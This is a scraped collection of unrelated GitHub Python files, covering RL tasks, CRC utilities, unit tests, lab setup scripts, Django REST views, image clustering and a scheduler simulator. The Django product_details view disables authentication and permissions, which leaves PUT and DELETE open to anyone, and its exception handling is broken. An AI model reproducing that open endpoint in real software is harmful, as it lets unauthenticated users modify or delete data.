env)\n","repo_name":"delfick/aws_syncr","sub_path":"aws_syncr/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":13542,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"64"} +{"seq_id":"44170414902","text":"from collections import namedtuple\nimport numpy as np\nfrom dm_control.rl.control import Task\nfrom dm_env import specs\n\nfrom environments.dm_control.utils import param\n\nclass Step(Task):\n \"\"\" Step task:\n Keep constant value and step to different constant value at t_step\n \"\"\"\n\n def __init__(self, **kwargs):\n super().__init__()\n # Define default parameters\n par = namedtuple('par', 'name value description')\n self.default_par_list = [\n par('task_name','Step','Name of task'),\n par('maxinflow',5.,'max control inflow'),\n par('h_goal1',1.,'[m] target height 1st time interval'),\n par('h_goal2',0.8,'[m] target height 2nd time interval'),\n par('t_step',float('inf'),'[s] switching instant 1st->2nd target'),\n par('debug',False,'if True store data during episode')\n ]\n\n # Generate parameter dictionary\n self.par_dict = {x.name: x.value for x in self.default_par_list}\n\n # Overload parameters from inputs\n param.overload_par_dict(self.par_dict, **kwargs)\n\n # Init variable to store results when debug == True\n self.datadict = []\n\n def initialize_episode(self, physics):\n # Eventually pass some parameters\n self.datadict = []\n physics.reset()\n\n def get_reference(self, physics):\n \"\"\"Returns target reference\"\"\"\n if physics.time() < self.par_dict['t_step']:\n target = self.par_dict['h_goal1']\n else:\n target = self.par_dict['h_goal2']\n return target\n\n def get_observation(self, physics):\n # Let the actor observe the reference and the state\n return np.concatenate((\n [self.get_reference(physics)],\n physics.get_state()\n ))\n\n def get_reward(self, physics):\n sigma = 0.1\n mean = self.get_reference(physics)\n # Gaussian like rewards on target\n return np.exp(\n -np.power(physics.get_state()[0] - mean, 2.)/(2*np.power(sigma, 2.))\n )\n\n def before_step(self, action, physics):\n physics.set_control(action)\n # Store data dictionary for debugging\n if self.par_dict['debug']: extend_debug_datadict(self, physics, action)\n\n def observation_spec(self, physics):\n \"\"\"Returns the observation spec.\"\"\"\n return specs.Array(\n shape=(2,),\n dtype=np.float32,\n name='observation')\n\n def action_spec(self, physics):\n \"\"\"Returns the action spec.\"\"\"\n return specs.BoundedArray(\n shape=(1,),\n dtype=np.float32,\n minimum=0.,\n maximum=self.par_dict['maxinflow'],\n name='action')\n\n def get_par_dict(self):\n \"\"\"Return dictionary with parameters\"\"\"\n return self.par_dict\n\n def write_config_file(self, path, filename):\n \"\"\"Writes toml configuration file from parameters\"\"\"\n param.write_config_file(\n self.default_par_list,\n self.par_dict,\n path,\n filename\n )\n\n def set_par_from_config_file(self, path):\n \"\"\"Read config file and set parameters\"\"\"\n param.set_par_from_config_file(self.par_dict, path)\n\n\n# TODO(fc) move following utiles elsewhere\ndef extend_debug_datadict(task, physics, action):\n \"\"\"Append episode data to datadictionary\n\n Data are stored before taking the step\n \"\"\"\n task.datadict.append(\n {\n 'state': physics.get_state(),\n 'action': action,\n 'time': physics.time(),\n 'observation': task.get_observation(physics),\n 'reward': task.get_reward(physics),\n }\n )\n","repo_name":"francescocarpanese/code_acme","sub_path":"environments/dm_control/tank/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":3708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"29468370542","text":"import re\n\nCRC_TABLE = (\n 0x0000,\n 0xCC01,\n 0xD801,\n 0x1400,\n 0xF001,\n 0x3C00,\n 0x2800,\n 0xE401,\n 0xA001,\n 0x6C00,\n 0x7800,\n 0xB401,\n 0x5000,\n 0x9C01,\n 0x8801,\n 0x4400, )\n\n\ndef calc_crc(mybytes, crc=0):\n for byte in bytearray(mybytes):\n byte_char = byte\n # Taken verbatim from FIT SDK docs\n tmp = CRC_TABLE[crc & 0xF]\n crc = (crc >> 4) & 0x0FFF\n crc = crc ^ tmp ^ CRC_TABLE[byte_char & 0xF]\n\n tmp = CRC_TABLE[crc & 0xF]\n crc = (crc >> 4) & 0x0FFF\n crc = crc ^ tmp ^ CRC_TABLE[(byte_char >> 4) & 0xF]\n return crc\n\n\nMETHOD_NAME_SCRUBBER = re.compile(r'\\W|^(?=\\d)')\nUNIT_NAME_TO_FUNC_REPLACEMENTS = (\n ('/', ' per '),\n ('%', 'percent'),\n ('*', ' times '), )\n\n\ndef scrub_method_name(method_name, convert_units=False):\n if convert_units:\n for replace_from, replace_to in UNIT_NAME_TO_FUNC_REPLACEMENTS:\n method_name = method_name.replace(\n replace_from,\n '%s' % replace_to, )\n return METHOD_NAME_SCRUBBER.sub('_', method_name)\n","repo_name":"romses/FitView","sub_path":"fitparse/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"24168010760","text":"with open(\"src/whitelisted_addresses.json\", \"r\") as fid:\n lines = fid.readlines()\n# end with open\n\nwith open(\"utils/whitelist/whitelisted_addresses.json\", \"w\") as fid:\n fid.write(\"[\\n\")\n for ii,line in enumerate(lines):\n address = line.replace(\"\\n\",\"\").replace(\"'\",\"\").replace('\"',\"\").replace(\",\",\"\").replace(\" \",\"\")\n\n good_address = \"0x1A3a1A68f995cF23ddb0bc0777e2f7e9162F7855\"\n if len(address) != len(good_address):\n print(\"bad address: \", address)\n print(\"len bad add: \", len(address))\n print(\"len good add: \", len(good_address))\n input(\">>\")\n continue\n # end if\n\n if ii == len(lines)-1:\n fid.write(' \"' + address + '\"\\n')\n else:\n fid.write(' \"' + address + '\",\\n')\n # end if/else\n # end for\n fid.write(\"]\")\n# end with open\n","repo_name":"ryanjsfx2424/ComputationalFluidDynamicNFTs","sub_path":"V3.0.4/OrigoNFT/origo-mint/make_json.py","file_name":"make_json.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"32806577305","text":"import unittest\n\nfrom data_structures.classes import TreeNode\nfrom lowest_common_ancestor.solution import lowest_common_ancestor\n\n\nclass LowestCommonAncestorTest(unittest.TestCase):\n\n def test_simple(self):\n q = TreeNode(1, None, None)\n root = TreeNode(2, q, None)\n actual = lowest_common_ancestor(root, root, q)\n\n self.assertEqual(root, actual)\n\n def test_root_lca(self):\n p = TreeNode(2,\n TreeNode(0, None, None),\n TreeNode(4,\n TreeNode(3, None, None),\n TreeNode(5, None, None)\n )\n )\n q = TreeNode(8,\n TreeNode(7, None, None),\n TreeNode(9, None, None)\n )\n root = TreeNode(6, p, q)\n actual = lowest_common_ancestor(root, p, q)\n\n self.assertEqual(root, actual)\n\n def test_second_level_lca(self):\n q = TreeNode(4, TreeNode(3, None, None), TreeNode(5, None, None) )\n p = TreeNode(2, TreeNode(0, None, None), q)\n root = TreeNode(6, p, TreeNode(8, TreeNode(7, None, None), TreeNode(9, None, None)))\n\n actual = lowest_common_ancestor(root, p, q)\n\n self.assertEqual(p, actual)\n","repo_name":"sbeins55/leetcode_practice","sub_path":"lowest_common_ancestor/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"41909577581","text":"# SPDX-License-Identifier: GPL-2.0\n#\n# Description:\n#\n# do setup needed for the laptop from hs, when used as\n# lapPC\n#\n# End:\n\nfrom tbotlib import tbot\n\nlogging.info(\"args: workfd %s %s\", tb.workfd, tb.config.tc_workfd_check_if_dir_exists_name)\n\n# setup ip addr for p2p1 interface\ncmd = 'sudo ifconfig p2p1 192.168.2.1 up'\ntb.write_lx_sudo_cmd_check(tb.workfd, cmd, tb.config.user, tb.config.ip)\n\n# check if ftdi module is loaded, rmmod it if yes\ncmd = 'sudo lsmod | grep ftdi'\nret = tb.write_lx_sudo_cmd_check(tb.workfd, cmd, tb.config.user, tb.config.ip, endTC = False)\nif ret == True:\n cmd = 'sudo rmmod ftdi_sio'\n tb.write_lx_sudo_cmd_check(tb.workfd, cmd, tb.config.user, tb.config.ip)\n\ntb.end_tc(True)\n","repo_name":"hsdenx/tbot","sub_path":"src/tc/lab/tc_lab_prepare_laptop_hs.py","file_name":"tc_lab_prepare_laptop_hs.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"64"} +{"seq_id":"43340175992","text":"def evaluate_condition(condition, row):\n column, operator, value = condition.split()\n column_index = columns.index(column)\n column_value = row[column_index]\n if operator == '>':\n return column_value > int(value)\n elif operator == '<':\n return column_value < int(value)\n\n\nN, M, Q = map(int, input().split())\ncolumns = input().split()\nrows = []\nfor _ in range(N):\n rows.append(list(map(int, input().split())))\nconditions = []\nfor _ in range(Q):\n conditions.append(input())\n\ntotal_sum = 0\nfor row in rows:\n valid = True\n for condition in conditions:\n if not evaluate_condition(condition, row):\n valid = False\n break\n if valid:\n total_sum += sum(row)\n\nprint(total_sum)\n","repo_name":"ishkining/leetcode-problems","sub_path":"codewars/backend_autumn_2023/task_c_1.py","file_name":"task_c_1.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"72072058445","text":"from rest_framework.decorators import api_view\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom product.models import Product\nfrom product.serializers import UserSerializer\nfrom rest_framework.decorators import authentication_classes, permission_classes\n\n@api_view(['GET', 'POST'])\ndef product_list(request):\n if request.method=='GET':\n product_list = Product.objects.all()\n serializers = UserSerializer(product_list,many=True)\n return Response (serializers.data)\n\n elif request.method=='POST':\n serializers = UserSerializer(data=request.data)\n if serializers.is_valid():\n serializers.save()\n return Response (serializers.data,status=status.HTTP_201_CREATED)\n return Response(serializers.errors,status=status.HTTP_400_BAD_REQUEST)\n\n@api_view(['GET','PUT','DELETE'])\n@authentication_classes([])\n@permission_classes([])\ndef product_details(request,pk):\n\n try:\n product_detail = Product.objects.get(pk=pk)\n except product_detail.DoesNotExist:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n if request.method == 'DELETE':\n product_detail.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n elif request.method=='GET':\n serializers = UserSerializer(product_detail)\n return Response (serializers.data)\n\n elif request.method=='PUT':\n serializers = UserSerializer(product_detail,data=request.data)\n if serializers.is_valid():\n serializers.save()\n return Response(serializers.data)\n return Response(serializers.errors,status=status.HTTP_400_BAD_REQUEST)","repo_name":"ashrakrahman/Django-Token-Based-Authentication","sub_path":"product/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"22944268887","text":"from tryptag import TrypTag, CellLine\r\nfrom constants import SELECTED_GENES\r\nimport os\r\nimport shutil\r\n\r\nselected_genes = SELECTED_GENES\r\n\r\ndef download_data():\r\n tryptag = TrypTag()\r\n\r\n for cell_id, cell_info in selected_genes.items():\r\n tryptag.fetch_data(CellLine(life_stage=cell_info[1], gene_id=cell_id, terminus=cell_info[0]))\r\n\r\ndef create_dataset():\r\n # Define the source directory where you want to search for files\r\n source_directory = \"_tryptag_cache\"\r\n\r\n # Define the destination directory where you want to copy the selected files\r\n destination_directory = \"dataset/raw\"\r\n\r\n # Create the destination directory if it doesn't exist\r\n if not os.path.exists(destination_directory):\r\n os.makedirs(destination_directory)\r\n\r\n # Iterate through all subdirectories in the source directory\r\n for dir in os.listdir(source_directory):\r\n if dir == \"_zenodo\":\r\n continue\r\n\r\n for file in os.listdir(os.path.join(source_directory, dir)):\r\n name = file.split(\"_\")[0]\r\n terminus = file.split(\"_\")[2]\r\n\r\n # If the name is in selected_genes and the terminus matches the expected value\r\n if name in selected_genes.keys() and \"tif\" in file and terminus == selected_genes[name][0].upper():\r\n\r\n # Create a subdirectory for the gene if it doesn't exist\r\n gene_directory = os.path.join(destination_directory, name)\r\n if not os.path.exists(gene_directory):\r\n os.makedirs(gene_directory)\r\n\r\n # Create the absolute path of the file by joining the source directory with the file name\r\n source_file = os.path.join(source_directory, dir, file)\r\n\r\n # Copy the file to the gene's subdirectory within the destination directory\r\n destination_file = os.path.join(gene_directory, file)\r\n print(\"Copying file: \" + source_file + \" to \" + destination_file)\r\n shutil.copy(source_file, destination_file)\r\n\r\n print(\"File copying process completed.\")\r\n\r\nif __name__ == \"__main__\":\r\n download_data()\r\n create_dataset()","repo_name":"edwo314/bachelor_thesis_trypanosoma","sub_path":"get_flagella_dataset.py","file_name":"get_flagella_dataset.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"17307274383","text":"\nX = list(map(float, input().split()))\nY = list(map(float, input().split()))\n#print(phy,his)\n\nx_mean = sum(X)/len(X)\ny_mean = sum(Y)/len(Y)\n\nx_y = list(map(lambda x, y: (x-x_mean) * (y-y_mean), X, Y))\nx_x = list(map(lambda x: (x-x_mean)*(x-x_mean), X))\ny_y = list(map(lambda y: (y-y_mean)*(y-y_mean), Y))\n\nnumerator = sum(x_y)\ndenum = pow(sum(x_x), 0.5) * pow(sum(y_y), 0.5)\n\nr = round(numerator/denum, 3)\n\nprint(r)","repo_name":"Atulnitp/Statistical-Analysis","sub_path":"CorrelationAndRegressionLine.py","file_name":"CorrelationAndRegressionLine.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"17494148660","text":"# 데이터셋 생성 (멀티프로세싱)\n# 최초 작성일 : 20/03/06\n# 작성자 : 양희승\n#\n# 작성내용 : 데이터셋 생성 속도 개선\n\nimport sys\nimport os\nsys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))))\nsys.path.append('F:/hs/pythonwork/project/cys')\n\nimport numpy as np\nfrom sklearn.cluster import KMeans\nimport cv2 as cv\nfrom cys import color_classifier # 예스리 임포트\nimport color_classifier\nimport colour\nimport warnings\nimport multiprocessing\n\nwarnings.filterwarnings(action='ignore')\n# warnings.filterwarnings(action='default')\n############################################################\n\ndef color_ratio(clt) :\n numLabels = np.arange(0, len(np.unique(clt.labels_))+1)\n (hist, _) = np.histogram(clt.labels_, bins=numLabels)\n hist = hist.astype(\"float\")\n hist /= hist.sum()\n return hist\n\n# k=5이므로 다섯개의 영역에 얼마만큼의 퍼센테이지가 차지되었는지 return된다.\n\ndef plot_colors(hist, centroids):\n bar = np.zeros((50, 300, 3), dtype = \"uint8\")\n startX = 0\n\n for (percent, color) in zip(hist, centroids):\n endX = startX + (percent * 300)\n cv.rectangle(bar, (int(startX), 0), (int(endX), 50),\n color.astype(\"uint8\").tolist(), -1)\n startX = endX\n return bar\n\n\ndef skin_detector(img, file_name):\n # 피부 검출1\n lower = np.array([0, 48, 80], dtype=\"uint8\")\n upper = np.array([20, 255, 255], dtype=\"uint8\")\n\n converted = cv.cvtColor(img, cv.COLOR_BGR2HSV)\n skinMask = cv.inRange(converted, lower, upper)\n\n kernel = cv.getStructuringElement(cv.MORPH_ELLIPSE, (11, 11))\n skinMask = cv.erode(skinMask, kernel, iterations=2)\n skinMask = cv.dilate(skinMask, kernel, iterations=2)\n\n skinMask = cv.GaussianBlur(skinMask, (3, 3), 0)\n skin = cv.bitwise_and(img, img, mask=skinMask)\n\n result = skin\n # plt.imshow(result)\n # plt.show()\n\n img = cv.cvtColor(result, cv.COLOR_BGR2HLS)\n skin_img = img\n temp_img = cv.cvtColor(img, cv.COLOR_HLS2RGB)\n\n h, w, c = img.shape\n\n for i in range(h):\n for j in range(w):\n H = img[i][j][0]\n L = img[i][j][1]\n S = img[i][j][2]\n\n R = temp_img[i][j][0]\n G = temp_img[i][j][1]\n B = temp_img[i][j][2]\n\n LS_ratio = L / S\n skin_pixel = bool((S >= 50) and (LS_ratio > 0.5) and (LS_ratio < 3.0) and ((H <= 25) or (H >= 165)))\n temp_pixel = bool((R == G) and (G == B) and (R >= 220))\n\n if skin_pixel:\n if temp_pixel:\n skin_img[i][j][0] = 0\n skin_img[i][j][1] = 0\n skin_img[i][j][2] = 0\n else:\n pass\n else:\n skin_img[i][j][0] = 0\n skin_img[i][j][1] = 0\n skin_img[i][j][2] = 0\n\n skin_img = cv.cvtColor(skin_img, cv.COLOR_HLS2BGR)\n for i in range(h):\n for j in range(w):\n B = skin_img[i][j][0]\n G = skin_img[i][j][1]\n R = skin_img[i][j][2]\n\n bg_pixel = bool(B == 0 and G == 0 and R == 0)\n\n if bg_pixel:\n skin_img[i][j][0] = 255\n skin_img[i][j][1] = 255\n skin_img[i][j][2] = 255\n else:\n pass\n\n # plt.imshow(skin_img)\n # plt.show()\n\n cvt_img = cv.cvtColor(skin_img, cv.COLOR_BGR2RGB)\n # plt.imshow(cvt_img)\n # plt.show()\n\n cvt_img = cvt_img.reshape((cvt_img.shape[0] * cvt_img.shape[1], 3))\n k = 20\n clt = KMeans(n_clusters=k)\n clt.fit(cvt_img)\n\n hist = color_ratio(clt)\n temp = np.array(clt.cluster_centers_)\n\n # hist에서 높은 값 제거, cluster_centers_에서도 제거)\n del_index = hist.argmax()\n hist = np.delete(hist, del_index)\n temp = np.delete(temp, del_index, 0)\n\n try:\n\n # hist에서 제일 낮은 값 제거, cluster_centers_ 에서도 제거\n del_index = np.argmin(hist)\n hist = np.delete(hist, del_index)\n temp = np.delete(temp, del_index, 0)\n\n del_index = np.argmin(hist)\n hist = np.delete(hist, del_index)\n temp = np.delete(temp, del_index, 0) # 3\n\n del_index = np.argmin(hist)\n hist = np.delete(hist, del_index)\n temp = np.delete(temp, del_index, 0) # 4\n\n del_index = np.argmin(hist)\n hist = np.delete(hist, del_index)\n temp = np.delete(temp, del_index, 0) # 5\n\n del_index = np.argmin(hist)\n hist = np.delete(hist, del_index)\n temp = np.delete(temp, del_index, 0)\n\n del_index = np.argmin(hist)\n hist = np.delete(hist, del_index)\n temp = np.delete(temp, del_index, 0)\n\n del_index = np.argmin(hist)\n hist = np.delete(hist, del_index)\n temp = np.delete(temp, del_index, 0)\n\n del_index = np.argmin(hist)\n hist = np.delete(hist, del_index)\n temp = np.delete(temp, del_index, 0)\n\n del_index = np.argmin(hist)\n hist = np.delete(hist, del_index)\n temp = np.delete(temp, del_index, 0)\n\n del_index = np.argmin(hist)\n hist = np.delete(hist, del_index)\n temp = np.delete(temp, del_index, 0)\n\n del_index = np.argmin(hist)\n hist = np.delete(hist, del_index)\n temp = np.delete(temp, del_index, 0)\n\n del_index = np.argmin(hist)\n hist = np.delete(hist, del_index)\n temp = np.delete(temp, del_index, 0)\n\n del_index = np.argmin(hist)\n hist = np.delete(hist, del_index)\n temp = np.delete(temp, del_index, 0)\n except ValueError:\n print(file_name, \"에러\")\n cv.imwrite(\"../dataset/value_error/\"+file_name+\".png\", img)\n pass\n\n # 비율 재조정\n hist = hist / hist.sum()\n ####################################\n\n # 그래프 그리기\n bar = plot_colors(hist, temp)\n\n # plt.figure()\n # plt.axis(\"off\")\n # plt.imshow(bar)\n # plt.show()\n\n # RGB변환 후 저장\n bar = cv.cvtColor(bar, cv.COLOR_BGR2RGB)\n # cv.imwrite(\"../img/\"+file_name+\"_test.jpg\", bar)\n\n return bar\n\n\ndef color_convert(cheek, file_name):\n img = cheek\n img = cv.cvtColor(img, cv.COLOR_BGR2RGB)\n # plt.imshow(img)\n # plt.show()\n\n sum = 0\n R = []\n G = []\n B = []\n for i in img:\n for j in i:\n R.append(j[0])\n G.append(j[1])\n B.append(j[2])\n\n R_sum = 0\n G_sum = 0\n B_sum = 0\n\n # 각 R, G, B의 합계 구하기\n for i in range(len(R)):\n R_sum += R[i]\n G_sum += G[i]\n B_sum += B[i]\n\n R_avg = int(round((R_sum / len(R)), 0)) # R값 평균\n G_avg = int(round((G_sum / len(G)), 0)) # G값 평균\n B_avg = int(round((B_sum / len(B)), 0)) # B값 평균\n RGB_color = [R_avg, G_avg, B_avg]\n\n # 평균 색만 그래프 그리기 위함 img_avg\n img_avg = img\n\n for i in img_avg:\n for j in i:\n j[0] = R_avg\n j[1] = G_avg\n j[2] = B_avg\n\n # 기존\n # plt.imshow(img)\n # plt.show()\n\n # 평균색\n # plt.imshow(img_avg)\n # plt.show()\n bgr_img_avg = cv.cvtColor(img_avg, cv.COLOR_RGB2BGR)\n\n # 저장\n # cv.imwrite(\"../img/\"+file_name+\"_9.jpg\", bgr_img_avg)\n\n arr_RGB_color = np.array(RGB_color)\n float_arr_RGB_color = arr_RGB_color / 255\n float_tp_RGB_color = tuple(float_arr_RGB_color)\n HSV_color = colour.RGB_to_HSV(float_tp_RGB_color)\n HSV_color2 = np.array(\n [round(HSV_color[0] * 359, 3), round(HSV_color[1] * 100, 3) - 4, round(HSV_color[2] * 100, 3) + 8])\n HSV_color2 = list(HSV_color2)\n HSV_color2[0] = round(HSV_color2[0], 2)\n HSV_color2[1] = round(HSV_color2[1], 2)\n HSV_color2[2] = round(HSV_color2[2], 2)\n return HSV_color2\n\n\ndef save_img(img, file_name, skin_type):\n if skin_type == 0:\n cv.imwrite(\"../dataset/00/\" + file_name + \".png\", img)\n elif skin_type == 1:\n cv.imwrite(\"../dataset/01/\" + file_name + \".png\", img)\n elif skin_type == 2:\n cv.imwrite(\"../dataset/02/\" + file_name + \".png\", img)\n elif skin_type == 3:\n cv.imwrite(\"../dataset/03/\" + file_name + \".png\", img)\n elif skin_type == 4:\n cv.imwrite(\"../dataset/04/\" + file_name + \".png\", img)\n elif skin_type == 5:\n cv.imwrite(\"../dataset/05/\" + file_name + \".png\", img)\n elif skin_type == 6:\n cv.imwrite(\"../dataset/06/\" + file_name + \".png\", img)\n elif skin_type == 7:\n cv.imwrite(\"../dataset/07/\" + file_name + \".png\", img)\n elif skin_type == -1:\n cv.imwrite(\"../dataset/error/\" + file_name + \".png\", img)\n print(\"분류오류 : \", file_name)\n else:\n cv.imwrite(\"../dataset/value_error/\" + file_name + \".png\", img)\n print(\"타입오류 : \", file_name, \" 타입번호 : \", skin_type)\n\ndef get_count(num, p=4):\n lists = []\n allocate = int(num / p)\n for n in range(p):\n lists.append(allocate)\n\n lists[p - 1] += num % p\n print(\"프로세스 할당량 :\", lists)\n return lists\n\ndef work(start_num, end_num) :\n for i in range(start_num, end_num, 1):\n ## 이미지 로드\n file_name = \"img (\" + str(i) + \")\"\n img = cv.imread(\"../crop/\" + file_name + \".png\")\n\n # 이미지 색 비율 추출\n bar = skin_detector(img, file_name)\n\n ## 평균색으로 변형\n hsv = color_convert(bar, file_name)\n\n # 예슬's 피부타입 분류 함수\n color_class = color_classifier.Color()\n skin_type = color_class.color_classifier(hsv)\n save_img(img, file_name, skin_type)\n\ncolor_type = [\"WSB\", \"WSL\", \"WAD\", \"WAM\", \"CSL\", \"CSM\", \"CWB\", \"CWD\"]\n\n\nif __name__ == \"__main__\" :\n\n num = int(1000)\n process_num = 4\n\n process = []\n start_num = 1\n end_num = 1\n for count in get_count(num, process_num):\n end_num += count\n print(\"실행 범위\", start_num, \"~\", end_num)\n p = multiprocessing.Process(target=work, args=(start_num, end_num))\n start_num += count\n process.append(p)\n p.start()\n\n for p in process:\n p.join\n","repo_name":"slmteruto/CAI","sub_path":"yhs/pycharm/skin_type_dataset_create.py","file_name":"skin_type_dataset_create.py","file_ext":"py","file_size_in_byte":10161,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"99"} +{"seq_id":"34799849427","text":"import umap\nimport umap.plot\nimport numpy as np\nfrom scipy.io import savemat\n\nA = np.load('../FEATURES/Time_signal_stats.npy')\nA = np.delete(A, slice(384*2, 384*4), 0)\n\n# target = np.concatenate((np.ones((100,)), 2*np.ones((100,)), 3*np.ones((100,))), axis=0)\ntarget = np.concatenate((np.ones((384,)), 2*np.ones((384,)), 3*np.ones((384,)), 4*np.ones((384,)), 5*np.ones((384,)), 6*np.ones((384,))), axis=0)\nprint(A.shape)\nprint(target.shape)\nmapper = umap.UMAP(n_neighbors=15,\n min_dist=0.3,\n metric='manhattan').fit(A)\ndata={'embedA':mapper.embedding_}\n# savemat(\"PDE2D_EC_N10_Umap.mat\", data)\np = umap.plot.points(mapper, labels=target)\numap.plot.show(p)","repo_name":"ZZKnight/EC-PDE","sub_path":"Stat_Umap.py","file_name":"Stat_Umap.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"27515918509","text":"from processo import Processo\nfrom cpu import Cpu\nimport random\n\nprocessos = []\n\n# Solicita ao usuário qual escalonador ele quer usar\nescalonador = input(\"Digite 1 para Round Robin ou 2 para Shortest-Job-First: \")\nif escalonador != '1' and escalonador != '2':\n raise Exception(f'Modo de Escalanador {escalonador} invalido') \nProcesso.setEscalanador(escalonador)\n\nquantidade_programas = int(\n input(\"Digite a quantidade de programas que deseja criar: \"))\n # Cria uma instancia da CPU\n\ncpu_ = Cpu(quantidade_programas, escalonador)\n\n# Solicita ao usuário a quantidade de programas que deseja criar\n# Cria um loop para receber as informações de cada processo\nfor i in range(quantidade_programas):\n arquivo = input(f\"Qual o nome do arquivo {i+1}? \")\n tempo_chegada = int(input(\"Qual o tempo de chegada? \"))\n prioridade = int(input(\"Qual a prioridade do processo? \"))\n quantum = int(input(\"Qual o quantum do processo? \"))\n tempo_execucao = int(input(\"Qual o tempo de execução do processo? \"))\n print()\n #Cria um processo\n process = Processo(tempo_chegada=tempo_chegada,\n prioridade=prioridade, quantum=quantum, tempo_execucao=tempo_execucao)\n process.carregar_instrucoes(arquivo)\n process.compile()\n cpu_.adicionar_processo(process)\n #Carrega as instruções que estão no arquivo.txt na lógica do processo que foi criado\n\n# process = Processo(tempo_chegada=0, prioridade=0, quantum=25, tempo_execucao=80)\n# process.carregar_instrucoes('programa04.txt')\n# process.compile() \n# cpu_.adicionar_processo(process)\n# process2 = Processo(tempo_chegada=10, prioridade=1, quantum=1, tempo_execucao=4)\n# process2.carregar_instrucoes('programa01.txt')\n# process2.compile() \n# cpu_.adicionar_processo(process2)\n# process3 = Processo(tempo_chegada=12, prioridade=0, quantum=25, tempo_execucao=5)\n# process3.carregar_instrucoes('programa04.txt')\n# process3.compile() \n# cpu_.adicionar_processo(process3)\ncpu_.run()","repo_name":"Specht1000/TP1-SiSop","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"34715173536","text":"__author__ = 'yzhou7'\r\n\r\nimport wx\r\n\r\nfrom src.DAL.DailyDataDAL import DailyDataDAL\r\nfrom src.UI.UserData import UserGridData\r\nfrom src.Util.TimeUtil import TimeUtil\r\n\r\n\r\n# this class provides entry point for all clients\r\n# it should have the following functions:\r\n# 1. view all buyers's data\r\n# 2. query single buyer'data\r\n# 3. clean up out-of-data data\r\n\r\nclass BuyerPanel(wx.Panel):\r\n\r\n def __init__(self, parent):\r\n wx.Panel.__init__(self, parent)\r\n self.SetBackgroundColour(\"white\")\r\n self.initUI()\r\n self.Show(True)\r\n\r\n def initUI(self):\r\n self.vBox = wx.BoxSizer(wx.VERTICAL)\r\n\r\n self.setupDateInput()\r\n self.displayTodayData()\r\n\r\n self.SetSizer(self.vBox)\r\n self.vBox.Layout()\r\n\r\n def setupDateInput(self):\r\n\r\n sizer = wx.GridBagSizer(4, 4)\r\n dateText = wx.StaticText(self, label='日期')\r\n sizer.Add(dateText, pos=(0, 0), flag=wx.EXPAND | wx.TOP | wx.LEFT, border=15)\r\n\r\n self.dateInput = wx.TextCtrl(self, value=TimeUtil.getToday(), style=wx.TE_PROCESS_ENTER)\r\n self.Bind(wx.EVT_TEXT_ENTER, self.onSearchDate, self.dateInput)\r\n sizer.Add(self.dateInput, pos=(0, 1),\r\n flag=wx.TOP | wx.LEFT, border=12)\r\n\r\n self.calculateButton = wx.Button(self, label='计算一天战况', size=(100, 30))\r\n sizer.Add(self.calculateButton, pos=(0, 2), flag=wx.EXPAND | wx.TOP | wx.LEFT, border=12)\r\n self.calculateButton.Enable(True)\r\n self.Bind(wx.EVT_TEXT, self.OnEnter, self.dateInput)\r\n self.Bind(wx.EVT_BUTTON, self.onSearchDate, self.calculateButton)\r\n\r\n self.warnMsg = wx.StaticText(self, label='非法日期,请重新输入')\r\n self.warnMsg.SetForegroundColour('red')\r\n sizer.Add(self.warnMsg, pos=(0, 3), flag=wx.TOP | wx.LEFT, border=15)\r\n self.warnMsg.Hide()\r\n\r\n self.vBox.Add(sizer, wx.ALIGN_TOP, 10)\r\n\r\n def displayTodayData(self):\r\n sizer = wx.GridBagSizer(4, 4)\r\n today = TimeUtil.getToday()\r\n # Load buyer data\r\n dailyData = DailyDataDAL.fetchAllByDate(today)\r\n\r\n # set data into data grid\r\n self.data = UserGridData()\r\n self.data.InsertRows(dailyData.toStringList())\r\n self.grid = wx.grid.Grid(self, size=(500, 300))\r\n self.grid.SetTable(self.data)\r\n self.grid.AutoSize()\r\n sizer.Add(self.grid, pos=(1, 1), span=(3, 3), flag=wx.EXPAND | wx.TOP, border=5)\r\n\r\n searchText = wx.StaticText(self, label='名称')\r\n sizer.Add(searchText, pos=(4, 1), flag=wx.EXPAND, border=5)\r\n\r\n self.searchInput = wx.TextCtrl(self, style=wx.TE_PROCESS_ENTER)\r\n self.Bind(wx.EVT_TEXT_ENTER, self.onSearchName, self.searchInput)\r\n sizer.Add(self.searchInput, pos=(4, 2),\r\n flag=wx.EXPAND | wx.LEFT | wx.RIGHT, border=5)\r\n\r\n\r\n self.searchBtn = wx.Button(self, label='查找', size=(100, 20))\r\n sizer.Add(self.searchBtn, pos=(4, 3))\r\n 